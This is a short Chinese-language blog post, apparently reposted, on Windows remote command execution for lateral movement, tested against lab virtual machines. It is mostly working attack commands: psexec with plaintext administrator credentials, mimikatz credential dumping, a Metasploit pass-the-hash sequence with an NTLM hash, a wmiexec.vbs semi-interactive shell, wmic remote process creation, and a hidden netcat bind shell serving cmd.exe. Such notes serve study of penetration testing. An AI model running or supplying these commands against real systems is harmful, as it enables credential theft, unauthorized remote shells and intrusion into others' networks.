Windows遠程命令執行——psexec、wmiexec、wmic、nc,這屬於橫向移動范疇,另外還有smbexec漏掉了


環境:Win10、Win7虛擬機

Windows遠程命令執行

1、psexec.exe遠程執行命令

psexec \\192.168.30.128 -u Administrator -p 123456789 cmd.exe

這里一開始登陸的是另一個管理員賬號,但是一直被拒絕訪問,后來把Administrator賬號取消隱藏,一下就連接上。之后看到一篇文章也有一樣的情況,只有Administrator賬號才能連接,就算是管理員用戶組的其他用戶也不能連接,UAC的問題。

2、使用Hash登陸Windows

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" "exit"

或者使用wce抓取hash值:

msf調用payload:

  1.  
    use exploit /windows /smb /psexec
  2.  
    show options
  3.  
    set RHOST 192.168 .30 .128
  4.  
    Set SMBPass 0182BD0BD4444BF867CD839BF040D93B:C22B315C040AE6E0EFEE3518D830362B
  5.  
    set SMBUser Administrator
  6.  
    show options
  7.  
    Run

3、利用wmiexec工具配合進行反彈半交互shell

cscript.exe //nologo wmiexec.vbs /shell 192.168.30.128 Administrator 123456789

還可以單條命令執行

4、WMI執行命令方式,無回顯

wmic /node:192.168.30.128 /user:Administrator /password:123456789  process call create "cmd.exe /c ipconfig>c:\result.txt"

執行成功后可以在被控制的機器里面找到執行結果的文件

5、nc遠程執行

先在被控機器上開啟監聽,-L:讓監聽者在連接多次掉線時仍堅持監聽,-d:讓nc隱藏運行,-e:指定要運行的程序,-p:監聽的端口

nc.exe -L -d -e cmd.exe -p 5555

控制端運行nc64.exe 192.168.30.128 5555

 

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM